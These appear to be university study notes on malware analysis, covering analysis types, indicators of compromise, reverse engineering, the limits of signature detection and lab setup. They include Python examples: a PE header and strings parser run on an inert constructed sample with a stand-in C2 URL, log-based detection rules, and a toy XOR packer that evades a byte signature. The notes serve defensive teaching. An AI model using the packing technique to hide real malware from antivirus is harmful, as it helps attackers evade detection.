MARE Unit-1 QA | PDF | Malware | Ransomware
MARE Unit-1 QA

Malware analysis is the process of studying malware to understand its functionality, origin, and potential impact, utilizing various tools and techniques such as static, dynamic, memory, and hybrid analysis. Indicators of compromise (IOCs) help identify potential malware presence through unusual network traffic, unexpected system behavior, and abnormal process activity. Reverse engineering malware involves analyzing its code to understand its purpose and functionality, supported by resources like online courses, books, and open-source tools.

Uploaded by Varsha

UNIT-1

1. What is malware analysis? Explain various malware analysis tools and techniques.

What is Malware Analysis?
Malware Analysis is the study or process of determining the functionality, origin and potential impact of a
given malware sample and extracting as much information from it as possible. The information that is extracted helps
to understand the functionality and scope of the malware, how the system was infected and how to defend
against similar attacks in future.

Objectives:
• To understand the type of malware and its functionality.
• To determine how the system was infected by the malware and whether it was a targeted attack or a
phishing attack.
• To determine how the malware communicates with the attacker.
• To enable future detection of the malware by generating signatures.

Various Malware Tools and Techniques:

1. Static Analysis Tools and Techniques:
Static analysis involves examining the malware without executing it. The goal is to understand the
malware's structure, code, and potential behaviors. Some static analysis tools and techniques include:
• Disassemblers: Disassemblers convert the machine code (binary) of the malware into human
readable assembly code. This allows analysts to understand the instructions executed by the
malware.
• Decompilers: Decompilers translate the binary code into higher-level programming languages,
such as C or C++. This helps in understanding the malware's logic and functionality at a more
abstract level.
• Strings Analysis: Extracting and analyzing strings present in the malware, which might reveal
important information like URLs, commands, or encryption keys used by the malware.
• PE Analysis Tools: For Windows executable files (PE files), PE analysis tools can extract
metadata, imports, exports, and other information from the malware's header.
2. Dynamic Analysis Tools and Techniques:
Dynamic analysis involves executing the malware in a controlled environment to observe its behavior
during runtime. This provides valuable insights into the malware's actions and interactions with the system.
Some dynamic analysis tools and techniques include:
• Sandboxing: Sandboxes are isolated environments where malware can be executed safely. This
allows analysts to observe the malware's behavior without risking the host system.
• Behavioral Analysis: Observing and documenting the actions and interactions of the malware with
the system, such as file modifications, registry changes, network communication, and processes
created.
• API Hooking: Intercepting and monitoring the application programming interfaces (APIs) used by
the malware to understand its interactions with the operating system.
• Network Traffic Analysis: Capturing and analyzing the network communications initiated by the
malware to identify communication protocols, command-and-control (C2) servers, and data
exfiltration attempts.
• Dynamic Code Analysis: Techniques like run-time debugging allow analysts to monitor the
execution of the malware step-by-step and inspect memory and CPU states.
3. Memory Analysis Tools and Techniques:
Memory analysis focuses on examining artifacts and payloads present in the system's memory.
This is especially useful for detecting file-less malware or malware that operates primarily
in-memory. Some memory analysis tools and techniques include:
• Memory Dumping: Extracting the contents of the system's memory for offline analysis, which
may reveal hidden or encrypted payloads and other memory-resident artifacts.
• Process Injection Analysis: Identifying and analyzing code injection techniques used by malware
to hide its presence or escalate privileges.
• Malicious Code Hunting: Searching for signs of malicious code and suspicious data structures
within the memory of a compromised system.
4. Hybrid Analysis:
Hybrid analysis combines aspects of static and dynamic analysis to gain a more comprehensive
understanding of the malware. This approach provides a broader view of the malware's behavior,
capabilities, and evasion techniques.
5. Automated Analysis Tools:
Automated analysis tools allow analysts to quickly analyze large volumes of malware samples. These
tools can execute malware in a sandboxed environment, generate reports, and extract IOCs automatically.
Some popular malware analysis tools include:
• IDA Pro: An interactive disassembler and debugger widely used for static analysis.
• Ghidra: An open-source software reverse engineering framework developed by the NSA.
• Cuckoo Sandbox: An open-source automated malware analysis system.
• Wireshark: A network protocol analyzer used for network traffic analysis.
• Volatility: A popular memory analysis framework for examining memory artifacts.
• YARA: A pattern matching tool used for creating and sharing malware signatures.
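The static-analysis bullets above (strings analysis and PE header inspection) in working form, as an added example that is not part of the original notes: a minimal parser for the DOS header, COFF header, optional-header magic and section table, plus a `strings`-style extractor, run on a tiny inert PE image constructed inline. The image, its section names, timestamp and embedded strings are all made up for the demonstration.

```python
import re
import struct
from datetime import datetime, timezone

MACHINE_NAMES = {0x014C: "x86", 0x8664: "x64", 0x01C4: "ARM", 0xAA64: "ARM64"}
IMAGE_FILE_DLL = 0x2000             # COFF Characteristics bit: the image is a DLL
IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section flags; a writable+executable section is a packer tell
IMAGE_SCN_MEM_WRITE = 0x80000000
COFF_HEADER = "<HHIIIHH"            # Machine, NumberOfSections, TimeDateStamp, SymTab, NumSyms, OptHdrSize, Characteristics
SECTION_HEADER = "<8sIIIIIIHHI"     # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, ..., Characteristics
INTERESTING = re.compile(r"https?://|HKEY_|CurrentVersion\\Run|\.dll\b|\.exe\b", re.I)


def parse_pe(data: bytes) -> dict:
    """Walk DOS header -> PE signature -> COFF header -> optional-header magic -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    off = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from(COFF_HEADER, data, off)
    off += struct.calcsize(COFF_HEADER)
    magic = struct.unpack_from("<H", data, off)[0]       # 0x10B = PE32, 0x20B = PE32+
    entry = struct.unpack_from("<I", data, off + 16)[0]  # AddressOfEntryPoint
    off += opt_size
    sections = []
    for i in range(nsec):
        f = struct.unpack_from(SECTION_HEADER, data, off + i * struct.calcsize(SECTION_HEADER))
        sections.append({
            "name": f[0].rstrip(b"\x00").decode("ascii", "replace"),
            "virtual_address": f[2], "virtual_size": f[1],
            "raw_offset": f[4], "raw_size": f[3],
            "executable": bool(f[9] & IMAGE_SCN_MEM_EXECUTE),
            "writable": bool(f[9] & IMAGE_SCN_MEM_WRITE),
        })
    return {
        "machine": MACHINE_NAMES.get(machine, hex(machine)),
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "compile_time": datetime.fromtimestamp(stamp, tz=timezone.utc).isoformat(),
        "pe32_plus": magic == 0x20B,
        "entry_point": entry,
        "sections": sections,
    }


def extract_strings(data: bytes, min_len: int = 6) -> list:
    """Printable ASCII runs, the same thing the `strings` utility prints."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


def interesting_strings(data: bytes) -> list:
    """Strings worth a second look: URLs, registry paths, module names."""
    return [s for s in extract_strings(data) if INTERESTING.search(s)]


def section_strings(data: bytes) -> dict:
    """Strings grouped by the section whose raw data contains them."""
    return {s["name"]: extract_strings(data[s["raw_offset"]:s["raw_offset"] + s["raw_size"]])
            for s in parse_pe(data)["sections"]}


def build_sample_pe() -> bytes:
    """Constructed, inert PE image: valid headers and two data sections, no executable code."""
    img = bytearray(0x80)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)                         # e_lfanew
    img += b"PE\x00\x00"
    img += struct.pack(COFF_HEADER, 0x8664, 2, 0x5F3E1234, 0, 0, 240, 0x0022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                           # PE32+ magic
    struct.pack_into("<I", opt, 16, 0x1000)                         # AddressOfEntryPoint
    img += opt
    text = b"\x90" * 16 + b"Hello from .text\x00"
    rdata = (b"http://c2.example.invalid/beacon\x00"
             b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00kernel32.dll\x00")
    img += struct.pack(SECTION_HEADER, b".text", len(text), 0x1000, 512, 512, 0, 0, 0, 0, 0x60000020)
    img += struct.pack(SECTION_HEADER, b".rdata", len(rdata), 0x2000, 512, 1024, 0, 0, 0, 0, 0x40000040)
    img += b"\x00" * (512 - len(img))                               # pad headers to first section
    return bytes(img + text.ljust(512, b"\x00") + rdata.ljust(512, b"\x00"))


if __name__ == "__main__":
    sample = build_sample_pe()
    info = parse_pe(sample)
    print({k: v for k, v in info.items() if k != "sections"})
    for s in info["sections"]:
        print(s)
    print("interesting strings:", interesting_strings(sample))
```

To inspect a real sample the same way, pass `open(path, "rb").read()` to `parse_pe` and `section_strings`; a section flagged both writable and executable is the usual first hint of a packer.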

2. Explain malware indicators of compromise.

Malware indicators are characteristics or patterns that may suggest the presence of malware (malicious
software) on a computer system or network. These indicators help cybersecurity professionals and
systems detect and identify potential threats. Here are common malware indicators:

1. Unusual Network Traffic:
• An increase in network traffic, especially to suspicious or unknown IP addresses.
• Unusual data transfer patterns or large amounts of data being sent to external servers.
2. Unexpected System Behaviour:
• Unusual system slowdowns, freezes, or crashes.
• Unexplained changes in system settings or configurations.
• Unexpected reboots or system shutdowns.
3. Anomalous File Activity:
• Unusual file modifications, creations, or deletions.
• Files with unexpected or suspicious names.
• Changes to critical system files or directories.
4. Unusual Registry Changes:
• Unauthorized modifications to the Windows Registry.
• Creation or modification of registry keys associated with auto-start functionality.
5. Abnormal Process Activity:
• Unknown or suspicious processes running in the background.
• Processes attempting to access sensitive system resources or perform unauthorized actions.
6. Unexpected System Connections:
• Outbound connections to known malicious IP addresses.
• Connections to command and control servers used by malware.
7. Antivirus or Security Alerts:
• Alerts from antivirus or security software indicating the presence of malicious files or behaviour.
• Frequent detections of malware signatures.
8. Unusual Login Activity:
• Multiple failed login attempts or unauthorized access.
• Login attempts from unusual locations or devices.
9. Changes in System Logs:
• Alterations to system logs to hide malicious activities.
• Monitoring and analysing log files for anomalies.
10. Malicious Payload Detection:
• Identifying and analysing malicious files or code within the system.
• Recognition of known malware signatures or patterns.
11. Behavioural Anomalies:
• Monitoring for deviations from normal user behaviour or system activity.
• Unusual patterns in user access times, file access, or data transfers.
12. Memory Exploitation:
• Detection of memory-based attacks, such as buffer overflows or injection attacks.
• Monitoring for unexpected changes in memory usage.
13. DNS Request Anomalies:
• Unusual patterns in DNS requests, such as multiple failed requests or requests to known malicious domains.
• DNS tunnelling techniques used by malware.
Security professionals use a combination of these indicators to implement intrusion detection and
prevention systems, conduct malware analysis, and enhance overall cybersecurity measures. Regular
monitoring and timely response to these indicators are crucial for mitigating the impact of malware attacks.
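Detection logic for three of the indicators above (unusual login activity, DNS request anomalies and connections to known malicious addresses), run over constructed log lines; this is an added example, not part of the notes. The log format, the thresholds, the documentation-range addresses and the "known-bad" list are all assumptions made for the demonstration.

```python
from collections import defaultdict, deque
from datetime import datetime

# Constructed stand-in for a threat-intel feed (documentation-range addresses, not real IoCs).
KNOWN_BAD_IPS = {"203.0.113.45", "203.0.113.77"}
FAILED_LOGIN_THRESHOLD = 5   # failures from one source address ...
FAILED_LOGIN_WINDOW_S = 60   # ... within this many seconds (indicator 8)
NXDOMAIN_THRESHOLD = 3       # failed lookups per client before we alert (indicator 13)
TUNNEL_LABEL_LEN = 32        # a single DNS label this long is rare in legitimate names
TUNNEL_DIGIT_RATIO = 0.4     # encoded data is digit-heavy; ordinary hostnames are not

# Constructed log lines in a simple "timestamp kind key=value ..." format.
SAMPLE_LOG = """\
2024-05-01T10:00:00 auth user=alice src=10.0.0.5 result=OK
2024-05-01T10:00:05 auth user=alice src=10.0.0.5 result=FAIL
2024-05-01T10:00:06 auth user=alice src=10.0.0.5 result=FAIL
2024-05-01T10:00:07 auth user=bob src=10.0.0.5 result=FAIL
2024-05-01T10:00:08 auth user=carol src=10.0.0.5 result=FAIL
2024-05-01T10:00:09 auth user=dave src=10.0.0.5 result=FAIL
2024-05-01T10:01:00 dns client=10.0.0.7 query=www.example.com rcode=NOERROR
2024-05-01T10:01:01 dns client=10.0.0.7 query=4d5a90000300000004000000ffff0000b8000000.t.example.net rcode=NOERROR
2024-05-01T10:01:02 dns client=10.0.0.9 query=kqzvxj.example.org rcode=NXDOMAIN
2024-05-01T10:01:03 dns client=10.0.0.9 query=wpmtrl.example.org rcode=NXDOMAIN
2024-05-01T10:01:04 dns client=10.0.0.9 query=hbgnsd.example.org rcode=NXDOMAIN
2024-05-01T10:02:00 conn src=10.0.0.7 dst=192.0.2.10 dport=443 proto=tcp
2024-05-01T10:02:01 conn src=10.0.0.7 dst=203.0.113.45 dport=8443 proto=tcp
"""


def suspicious_label(label: str) -> bool:
    """DNS-tunnelling heuristic: very long labels or labels that look like encoded data."""
    if len(label) >= TUNNEL_LABEL_LEN:
        return True
    digits = sum(ch.isdigit() for ch in label)
    return len(label) >= 16 and digits / len(label) >= TUNNEL_DIGIT_RATIO


def parse_line(line: str):
    ts, kind, *pairs = line.split()
    return datetime.fromisoformat(ts), kind, dict(p.split("=", 1) for p in pairs)


def detect(log_text: str) -> list:
    """Return (indicator, subject, detail) tuples in the order the evidence appears."""
    alerts = []
    fail_times = defaultdict(deque)   # source address -> timestamps of recent failures
    nxdomain = defaultdict(int)       # client -> NXDOMAIN count
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ts, kind, f = parse_line(raw)
        if kind == "auth" and f["result"] == "FAIL":
            window = fail_times[f["src"]]
            window.append(ts)
            while (ts - window[0]).total_seconds() > FAILED_LOGIN_WINDOW_S:
                window.popleft()
            if len(window) == FAILED_LOGIN_THRESHOLD:   # fire once, when the threshold is crossed
                alerts.append(("unusual_login", f["src"],
                               f"{len(window)} failed logins within {FAILED_LOGIN_WINDOW_S}s"))
        elif kind == "dns":
            client, name = f["client"], f["query"]
            if any(suspicious_label(label) for label in name.split(".")):
                alerts.append(("dns_tunnelling", client, f"data-like label in {name}"))
            if f["rcode"] == "NXDOMAIN":
                nxdomain[client] += 1
                if nxdomain[client] == NXDOMAIN_THRESHOLD:
                    alerts.append(("dns_anomaly", client, f"{NXDOMAIN_THRESHOLD} failed lookups"))
        elif kind == "conn" and f["dst"] in KNOWN_BAD_IPS:
            alerts.append(("malicious_connection", f["src"],
                           f"outbound to known-bad {f['dst']}:{f['dport']}"))
    return alerts


if __name__ == "__main__":
    for indicator, subject, detail in detect(SAMPLE_LOG):
        print(f"{indicator:22s} {subject:12s} {detail}")
```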

3. What are the types of malware analysis? Explain them in detail.

What is Malware Analysis?
Malware Analysis is the study or process of determining the functionality, origin and potential impact of a
given malware sample and extracting as much information from it as possible. The information that is extracted helps
to understand the functionality and scope of the malware, how the system was infected and how to defend
against similar attacks in future.

Types of Malware Analysis:

1. Static Analysis:

Static analysis involves examining the malware without actually executing it. Analysts dissect the code
and structure of the malware to gain insights into its inner workings. Techniques used in static analysis
include:
• Code Review: Manually examining the source code of the malware to identify suspicious or malicious
functions, APIs, and behaviors.
• Disassembling and Decompiling: Transforming the binary code into human-readable assembly
language (disassembling) or a higher-level programming language (decompiling) to better understand the
code's functionality.
• Strings Analysis: Extracting and analyzing strings present in the malware, which might reveal indicators
of compromise (IOCs), such as command-and-control (C2) server URLs or encryption keys.
• Signature-based Detection: Creating signatures or patterns based on known malware characteristics to
detect and block similar malware in the future.
2. Dynamic Analysis:
Dynamic analysis involves executing the malware in a controlled environment, such as a virtual
machine (VM), and observing its behavior during runtime. Techniques used in dynamic analysis include:
• Sandboxing: Running the malware in an isolated and controlled environment to monitor its actions, such
as file modifications, network communication, and process creation.
• Behavioral Analysis: Observing and documenting the actions and interactions of the malware with the host
system and other processes to understand its capabilities and intentions.
• API Hooking: Intercepting and monitoring the application programming interfaces (APIs) used by the
malware to gain insight into its actions and interactions with the operating system.
• Network Traffic Analysis: Capturing and analyzing the network communications initiated by the malware
to identify communication protocols, C2 servers, and data exfiltration attempts.
3. Memory Analysis:
Memory analysis focuses on examining the malware's activities and artifacts present in the system's
memory. This is particularly useful for detecting and analyzing fileless malware or malware that operates
primarily in-memory. Techniques used in memory analysis include:
• Memory Dumping: Extracting the contents of the system's memory for offline analysis to identify hidden
or encrypted payloads and other memory-resident artifacts.
• Process Injection Analysis: Identifying and analyzing code injection techniques used by malware to
hide its presence or escalate privileges.
• Malicious Code Hunting: Searching for telltale signs of malicious code and suspicious data structures
within the memory of a compromised system.
4. Hybrid Analysis:
Hybrid analysis combines aspects of static and dynamic analysis to gain a more comprehensive
understanding of the malware. This approach provides a broader view of the malware's behavior,
capabilities, and evasion techniques.
5. Reverse Engineering:
Reverse engineering involves deconstructing the malware to understand its logic and functionality
fully. It is a crucial process in understanding advanced or previously unknown malware. Analysts may
use various tools and techniques, such as disassemblers, debuggers, and other specialized software to
reverse engineer the malware code.
6. Automated Analysis:
Automated analysis relies on security tools and systems to quickly analyze large volumes of malware
samples. These tools can execute malware in a sandboxed environment, generate reports, and extract IOCs
automatically.

By employing a combination of these malware analysis techniques, cybersecurity experts can better
understand the threat posed by malware, devise appropriate countermeasures, and develop better-informed
incident response strategies.

4. Explain in detail about reverse engineering and resources for reverse engineering malware.
What Is Reverse Engineering Malware?
Reverse engineering malware is the process of analyzing malware to understand its functionality and
purpose. This process can determine how to remove the malware from a system or create defenses against
it.
Reverse engineering malware is challenging, as malware is often designed to be difficult to analyze.
Typically, a dedicated malware reverse engineering training program is needed to become proficient at it. Threat
actors may use obfuscation techniques, encryption, and other tricks to make their programs more complex.
In addition, malware authors may change the code frequently to make it harder to reverse engineer.

When Should You Reverse Engineer Malware?

Reverse engineering is a critical part of understanding and combating malware. When malware is discovered,
the first thing that security researchers want to know is how it works.

However, simply understanding how malware works isn’t enough to protect against it. To be truly effective,
security researchers need to be able to not only understand how malware works but also predict how it will
evolve.
Security researchers must have a strong understanding of assembly language and computer architecture to
reverse engineer malware. Assembly language is the lowest level of programming language, and it’s used
to write programs that are very close to the hardware. This makes it ideal for writing malware, as it gives
the attacker much control over what the code does.
Computer architecture is the study of how computers are designed and how they work. By understanding
computer architecture, security researchers can better understand how malware works and how it can be
used to attack systems.

What Are the Steps of Reverse Engineering?

When it comes to reverse engineering, six steps are generally followed to successfully carry out the process:
1. Acquire a sample of the malware by downloading it from the internet or receiving it from someone
else.
2. Obtain a disassembler or decompiler. Many different programs can be used for this purpose.
3. Use the disassembler or decompiler to analyze the code of the malware. This will help you
understand how the malware works and what it does.
4. Create a sandbox environment, which is a safe place where you can run the malware to see what it
does without risking infecting your computer.
5. Run the malware in the sandbox environment and observe its behavior.
6. Generate a report of your findings. This will help you communicate your results to others who may
be interested in reverse engineering the malware.
Resources for Reverse Engineering Malware:
1. Online Courses and Tutorials:
- Platforms like Coursera, Udemy, and Cybrary offer courses on reverse engineering and malware analysis.
- Websites such as Malware Analysis Tutorials provide free resources and tutorials on reverse engineering
malware.
2. Books and Publications:
- Books like "Practical Malware Analysis" by Michael Sikorski and Andrew Honig, and "The Art of Memory
Forensics" by Michael Hale Ligh, Andrew Case, and Jamie Levy provide comprehensive insights into reverse
engineering and malware analysis.
3. Training Labs and Challenges:
- Platforms like Hack The Box, TryHackMe, and CTFTime host capture-the-flag (CTF) challenges and
labs focused on reverse engineering and malware analysis.
4. Online Communities and Forums:
- Engage with communities such as Reddit's r/ReverseEngineering, MalwareTips Forums, and the
Reverse Engineering Discord server to seek guidance, share experiences, and collaborate with other
enthusiasts.
5. Conferences and Workshops:
- Attend cybersecurity conferences such as DEF CON, Black Hat, and RSA Conference, which often
feature presentations, workshops, and training sessions on reverse engineering and malware analysis.
6. Open-Source Tools and Projects:
- Explore open-source tools and projects like Ghidra, REMnux, Volatility, and YARA, which are widely
used in the reverse engineering and malware analysis community.
7. Vendor Documentation and Resources:
- Check vendor websites and documentation for resources on reverse engineering malware targeting
their products or platforms.
- Many security vendors offer whitepapers, case studies, and technical articles on malware analysis and
threat intelligence.
8. Research Papers and Journals:
- Review academic research papers, journals, and conference proceedings in the field of cybersecurity,
malware analysis, and reverse engineering for in-depth insights and novel techniques.
By leveraging these resources and applying systematic reverse engineering methodologies, analysts can
effectively dissect and understand the behavior of malware, thereby enhancing their ability to detect, analyze,
and mitigate cyber threats.

5. Explain the difference between behavioural analysis and code analysis.

BEHAVIOURAL ANALYSIS VS. CODE ANALYSIS

Behavioral Analysis and Code Analysis are two distinct approaches used in malware analysis to understand
and dissect malicious software. Here are the key differences between these two methods:

Behavioral Analysis:
1. Focus: Behavioral analysis concentrates on observing and documenting the actions and interactions of
malware with the target system during runtime.
2. Execution Environment: The malware is executed in a controlled environment, such as a sandbox or
virtual machine, to observe its behavior without affecting the host system.
3. Observations: Analysts look for various activities performed by the malware, such as file modifications,
network communications, registry changes, process creations, and attempts to escalate privileges.

4. Advantages:
• Provides a real-world perspective of how the malware behaves on an actual system.
• Useful for identifying new and unknown malware that may not have specific signatures.
• Helps reveal evasive behavior, such as self-destruct mechanisms and anti-analysis techniques.

5. Limitations:
• Cannot provide insights into the internal code structure and logic of the malware.
• May miss certain aspects of malware behavior that require deep analysis of the code.

Code Analysis:
1. Focus: Code analysis involves examining the malware's binary code, assembly language, or source code
to understand its internal structure, logic, and functionality.
2. Execution Environment: Code analysis is typically conducted in a static environment without executing
the malware. The analysis focuses on studying the code's attributes without running it on a live system.
3. Observations: Analysts review the assembly language or decompiled code to identify instructions,
functions, data structures, and potential vulnerabilities.

4. Advantages:
• Provides a deep understanding of the malware's logic and functionality.
• Helps identify specific techniques used by the malware, such as encryption, packing, or code injection.
• Useful for generating detection signatures and understanding the full extent of the malware's capabilities.

5. Limitations:
• Cannot capture dynamic behaviors of the malware that may occur during runtime.
• May miss evasive techniques that are only observable in a live execution environment.

Combining Behavioral and Code Analysis:

Both behavioral and code analysis complement each other, and combining these approaches can provide a
more comprehensive view of the malware. By leveraging both techniques, analysts can:
• Observe the malware's behavior during runtime to understand its real-world impact on the target system.
• Extract IOCs (Indicators of Compromise) from the behavioral analysis to identify the presence of malware
on other systems.
• Use code analysis to gain a detailed understanding of the malware's internal mechanisms, capabilities, and
possible evasion techniques.
• Develop signatures and rules based on code analysis to enhance detection capabilities.
Ultimately, a holistic approach that integrates behavioral and code analysis, along with other
malware analysis techniques, allows cybersecurity professionals to effectively combat sophisticated and
evolving threats.
OR

6. Discuss the limitations of signature-based malware detection.

Signature-based malware detection, while effective in many cases, also comes with several limitations that
can be exploited by malware developers to evade detection. Here are some key limitations:
1. Dependency on Known Signatures:
- Signature-based detection relies on identifying specific patterns or signatures that are associated with known
malware variants.
- New or modified malware that does not match existing signatures can easily evade detection by signature-based
systems.
2. Inability to Detect Polymorphic Malware:
- Polymorphic malware employs techniques to mutate its code while preserving its functionality, making it
difficult to detect using static signatures.
- Each instance of polymorphic malware may have a unique signature, rendering traditional signature-based
detection ineffective.
3. Limited Coverage:
- Signature-based detection systems are only effective against malware for which signatures have been created
and updated.
- Emerging or zero-day threats that have not yet been identified and added to signature databases can bypass
detection.
4. Overhead of Signature Management:
- Maintaining a comprehensive database of malware signatures requires significant resources and effort.
- Constant updates are necessary to keep up with the evolving threat landscape, which can lead to delays in
detecting new threats.
5. False Positives and False Negatives:
- Signature-based detection may produce false positives (incorrectly identifying benign software as malware)
or false negatives (failing to detect actual malware).
- False positives can lead to unnecessary alarm and disruption, while false negatives pose a serious security risk
by allowing malware to go undetected.
6. Easy Signature Obfuscation:
- Malware authors can easily obfuscate their code to evade signature-based detection.
- Techniques such as code encryption, packing, and obfuscation can alter the appearance of malware binaries,
making them unrecognizable to signature-based scanners.
7. Limited Effectiveness Against Targeted Attacks:
- Signature-based detection is less effective against targeted attacks, where attackers tailor their malware
specifically to evade detection by known security measures.
- Targeted malware may be designed to evade signature-based detection by employing sophisticated evasion
techniques or zero-day vulnerabilities.
8. Performance Overhead:
- Scanning every file or network packet for signatures can impose a significant performance overhead,
especially in high-throughput environments.
- The need to scan for signatures in real-time may introduce latency and impact system performance.
To overcome the limitations of signature-based detection, organizations often employ a multi-layered
approach to cybersecurity, integrating other detection techniques such as behavior-based analysis, anomaly
detection, machine learning, and threat intelligence feeds. By combining multiple detection methods,
organizations can improve their ability to detect and mitigate a broader range of threats, including those
that evade signature-based detection.
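An added example (not from the notes) that makes points 2 and 6 concrete: a byte signature that matches a sample's plain body misses that same body once a toy packer has encrypted it, and every packer key produces a different file, while an entropy heuristic, one of the signature-independent layers mentioned in the closing paragraph, still flags the packed form. The payload strings, the signature and the packer are constructed here; the "unpacked" view stands in for what dynamic or memory analysis sees after the sample has decoded itself.

```python
import hashlib
import math
import re

# Constructed signature over a config string a vendor might key on in the known sample.
SIGNATURE = re.compile(rb"beacon to https?://[a-z0-9.\-]+/[a-z]+ every \d+s")
PACKED_ENTROPY = 7.0  # bits per byte; plain code and text sit well below, compressed or encrypted data near 8


def build_plain_sample() -> bytes:
    """Stand-in for the unpacked body of a known sample: a header stub plus config strings only."""
    body = (b"[config]\nbeacon to http://c2.example.invalid/gate every 300s\n"
            b"persist via HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n")
    return b"MZ" + b"\x00" * 62 + body * 12


def keystream(key: bytes, length: int) -> bytes:
    """Deterministic key-derived byte stream (SHA-256 in counter mode) used by the toy packer."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "little")).digest()
        counter += 1
    return bytes(out[:length])


def pack(plain: bytes, key: bytes) -> bytes:
    """Toy packer: 4-byte marker, 8-byte key, then the body XORed with the key stream.
    A different key yields a different file whose behaviour is identical once unpacked."""
    assert len(key) == 8
    body = bytes(a ^ b for a, b in zip(plain, keystream(key, len(plain))))
    return b"PACK" + key + body


def unpack(packed: bytes) -> bytes:
    """What dynamic or memory analysis sees after the stub has run: the original body."""
    key, body = packed[4:12], packed[12:]
    return bytes(a ^ b for a, b in zip(body, keystream(key, len(body))))


def signature_match(data: bytes) -> bool:
    return SIGNATURE.search(data) is not None


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte, the usual packed-section heuristic."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def looks_packed(data: bytes) -> bool:
    return shannon_entropy(data) >= PACKED_ENTROPY


def scan(data: bytes) -> dict:
    """Layered verdict: exact signature first, entropy heuristic as the signature-independent fallback."""
    return {"signature": signature_match(data), "high_entropy": looks_packed(data)}


if __name__ == "__main__":
    plain = build_plain_sample()
    views = [("plain", plain),
             ("packed, key A", pack(plain, b"key-0001")),
             ("packed, key B", pack(plain, b"key-0002")),
             ("unpacked in sandbox", unpack(pack(plain, b"key-0001")))]
    for label, blob in views:
        print(f"{label:22s} entropy={shannon_entropy(blob):.2f} {scan(blob)}")
```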

7. Discuss the importance of setting up a controlled environment for reverse engineering malware.

BRIEF OVERVIEW OF MALWARE ANALYSIS LAB SETUP AND CONFIGURATION

A lab setup for malware analysis typically includes the following components:
1. Virtual Machines: Virtual machines are used to isolate the malware and prevent it from causing
harm to the host system.
2. Analysis Tools: Tools such as antivirus software, sandboxing tools, and disassemblers are used to
analyse the behaviour of malware and understand its functionality.
3. Networking: A virtual network is used to simulate a real-world environment, allowing the malware
to communicate with other systems and allowing the analyst to observe its behaviour.
4. Storage: A large storage device is used to store the malware samples and analysis data.
5. Monitoring Tools: Monitoring tools such as network sniffers and process monitors are used to
track the behaviour of malware and collect data for analysis.
6. Backup System: A backup system is used to ensure that the analysis environment can be quickly
restored if it becomes compromised or unstable.
7. Documentation: Documentation is important for keeping track of the analysis process and for
sharing information with others who may be involved in the analysis.

It’s important to note that a malware analysis lab must be designed and managed with security in mind.
Access to the lab should be restricted, and all tools and systems used in the lab should be kept up-to-date
and regularly reviewed to ensure that they are secure.
Threats are one of the most challenging areas in the field of information security, and the lack of qualified
personnel makes it even harder for companies to keep their information and assets secure and respond to such
a situation without incurring much loss. Malware analysis is the process of determining the origin, potential
impact, and functionality of a given malware sample such as a virus, trojan horse, etc. In this article, we are
not going to discuss the whereabouts of malware or malware analysis. Rather, we will see how you can
effectively set up a lab for malware analysis. As one plan cannot fit the needs of all organizations, we
need to keep in mind a few alternatives and decide the best according to your organization's needs.

Why do we need a Malware Analysis Lab?

A malware analysis lab can help you in any of the following ways:
• It will increase your analysis speed.
• A suitable environment provides a framework for identifying TTPs and IOCs.
• A malware analysis lab will help you to get control of what gets in and out of the network.
• It will decrease the risk of infection.

Steps for setting up a Malware Analysis Lab

To set up the malware analysis lab, follow the points mentioned below.
1. Network: One of the most important and the first step in setting up a lab is to define its network. Here
are a few reasons why this step is important:
• You need to have information about your network to identify uncommon patterns and uncommon
connection attempts.
• You need to know about what is going in and what is going out of the network.
• You need to intercept traffic between your Analysis system and the Network.
• You need to isolate the analysis system from other computers.
Choose your favourite private network address space and assign a static IP address to each one of your
systems. The reason for this allotment is that once you start collecting network information, you will
spend most of your time trying to figure out which system an address belongs to if you don't keep a list.
You're also going to need a dedicated machine to control your network traffic and to act as a gateway for
your lab. REMnux and Kali are two options that you can consider for your gateway.
2. Virtualization: Virtualization software is required in either of the following scenarios:
• When you don’t have a few spare machines, a switch, and a dedicated physical space for this.
• You simply want to carry your Lab with you whenever you go.
There are a few options for virtualisation software, such as VMware, QEMU and VirtualBox (free), and if you don't
mind spending a few bucks then you can go for VMware Workstation. Virtualization software will allow
you to host your entire lab on a single machine, and it provides another interesting feature: snapshots.
Snapshots allow you to revert the state of your machines to a clean state, so you can start an analysis over
and over again. They are quite useful for keeping track of your work on long analyses. If you are using
virtualization software, how you set up your virtual network is very important. You have three options for
this:
• Bridged: Do not use bridged mode; this can expose your network to threats, and you don't want
to infect anybody else's systems.
• NAT: This is the ideal choice. Disable DHCP so you can stick to your design.
• Host-Only: Host-Only only lets your virtual systems communicate with your host machine; you
don't want this either.
3. Analysis Machines: If you are going to do malware analysis, then you will need a variety of systems to
run your samples, execute your tools, and do static and dynamic analysis. Follow these simple steps to set
up each one of the systems that you choose:
• Install the operating system and install the security updates.
• Install virtual machine tools (optional).
• Install analysis tools; for Windows, you can check FLARE VM to automate some of this task.
• Set up the network configuration.
• Save a snapshot in a clean state.
4. Testing your Environment: Before starting with the analysis, you need to make sure that everything is
perfect and working fine. For this you need to check the following things:
• Make sure no analysis machine has access to the Internet or your home/work network. You can
control this with the gateway. Try turning it ON and OFF so that you can get familiar with the
process.
• Turn all your machines ON and try running a network scan to see that everything is working
properly.
• It is very important to make sure that all your machines have a snapshot in a clean state. You
should have clear rules and definitions stating how often you will update them to install security
patches, new software versions, and other caveats.

